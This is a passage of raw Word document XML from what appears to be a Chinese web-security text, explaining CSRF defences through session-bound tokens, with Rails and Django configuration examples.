          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>攻击的基础。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="202" w:right="221" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t>对于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>框架来说，可以自动地在所有涉及 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>的代码中添加 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，这些地方包括所</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t>有的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>form </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>表单、所有的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ajax POST </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>请求等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="160"/>
        <w:ind w:left="603"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>完整的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>防御方案，对于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>框架来说有以下几处地方需要改动。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="502"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>）在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Session </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中绑定 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。如果不能保存到服务器端 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Session </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中，则可以替代为保存到</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:ind w:left="202"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>里。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="202" w:right="163" w:firstLine="299"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>）在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>form </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>表单中自动填入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>token </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>字段，比如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>&lt;input type=hidden name="anti_csrf_token" value="$token" /&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="155"/>
        <w:ind w:left="502"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>）在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ajax </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>请求中自动添加 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，这可能需要已有的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ajax </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>封装实现的支持。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="502"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>）在服务器端对比 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>POST </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>提交参数的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>token </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Session </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中绑定的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>token </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>是否一致，以验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="73"/>
        <w:ind w:left="202"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
        </w:rPr>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Rails </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>中，要做到这一切非常简单，只需要在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Application Controller </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中增加一行即可：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="8396" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="166"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>protect_from_forgery :secret =&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-34"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>"123456789012345678901234567890..."</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="623"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>它将根据 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>secret </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>和服务器端的随机因子自动生成 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>，并自动添加到所有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>form </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t>和由 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Rails</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="453" w:lineRule="auto" w:before="72"/>
        <w:ind w:left="604" w:right="1438" w:hanging="401"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>生成的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ajax </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>请求中。通过框架实现的这一功能大大简化了程序员的开发工作。在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Django </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中也有类似的功能，但是配置稍微要复杂点。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-24"/>
        </w:rPr>
        <w:t>首先，将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>django.middleware.csrf.CsrfViewMiddleware </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>添加到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>MIDDLEWARE_CLASSES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="174"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="width:411.15pt;height:50.05pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <w10:anchorlock/>
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="8"/>
                    <w:ind w:left="108" w:right="2526" w:hanging="80"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>('django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:b/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>'django.middleware.csrf.CsrfViewMiddleware', </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware',)</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="146"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>然后，在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>form </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>表单的模板中添加 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="8396" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="165"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>&lt;form action="." method="post"&gt;{% csrf_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-22"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>%}</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>接下来，确认在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>View </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>层的函数中使用了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>django.core.context_processors.csrf</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，如果使用的是</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>RequestContext</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，则默认已经使用了，否则需要手动添加。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:7.873613pt;width:411.15pt;height:80.05pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4408;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="8"/>
                    <w:ind w:left="28" w:right="3662" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>from django.core.context_processors import csrf from django.shortcuts import render_to_response</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="9"/>
                    <w:rPr>
                      <w:sz w:val="15"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="0"/>
                    <w:ind w:left="345" w:right="6158" w:hanging="317"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>def my_view(request): c = {}</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="2"/>
                    <w:ind w:left="345" w:right="5649" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>c.update(csrf(request)) # ... view code here</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="181" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="345" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>return render_to_response("a_template.html", c)</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="77"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>这样就配置成功了，可以享受 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>防御的效果了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="202" w:right="220" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ajax </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t>请求中，一般是插入一个包含了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="46"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-32"/>
        </w:rPr>
        <w:t>头，使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t>头是为了防止</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>泄密，因为一般的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>无法获取到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>头的信息，但是在存在一些跨域漏洞时可能会出现例外。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="156"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>下面是一个在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ajax </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中添加自定义 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>token </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的例子。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="264" w:lineRule="auto" w:before="165"/>
        <w:ind w:left="519" w:right="3289" w:hanging="317"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
